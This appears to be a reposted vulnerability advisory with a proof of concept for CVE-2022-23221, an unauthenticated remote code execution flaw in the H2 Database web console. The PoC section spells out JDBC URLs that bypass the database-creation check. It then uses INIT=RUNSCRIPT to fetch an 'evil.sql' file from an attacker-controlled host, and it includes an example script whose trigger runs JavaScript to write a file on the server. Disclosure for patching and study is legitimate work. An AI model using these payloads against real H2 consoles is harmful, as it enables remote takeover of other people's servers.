- Document Title
- Product Description
- http://www.h2database.com/html/quickstart.html
Affected Components">Homepage: http://www.h2database.com/html/quickstart.html
Affected Components - PoC
- 参考链接
Document Title
Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221.
Product Description
The H2 Console Application
The Console lets you access a SQL database using a browser interface.
Homepage: http://www.h2database.com/html/quickstart.html
Affected Components
File Name: WebServer.java
File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java
Impacted Function: getConnection
PoC
- Navigate to the console and attempt to connect to a H2 in memory
database that does not exist using the following JDBC URL:
jdbc:h2:mem:1337;
- Note that you get the following security exception preventing you
from creating a new in memory database:
Database "mem:1337" not found, either pre-create it or allow remotedatabase creation (not recommended in secure environments) [90149-209]90149/90149 (Help)
- Now try again with the following JDBC URL:
jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\
- Note that you were able to successfully create a new in memory database
- Create a SQL file that contains a trigger that executes
java/javascript/ruby code when executed and host it on a domain you
control (ex: http://attacker) - Use the following JDBC URL to execute the SQL file hosted on your
domain on connect:
jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPTFROM 'http://attacker/evil.sql';'\
Example evil.sql file:
CREATE TABLE test (id INT NOT NULL);CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascriptvar fos = Java.type("java.io.FileOutputStream");var b = new fos ("/tmp/pwnedlolol");';INSERT INTO TEST VALUES (1);
CVE Issued: CVE-2022-23221
参考链接
若有收获,就点个赞吧
0 人点赞
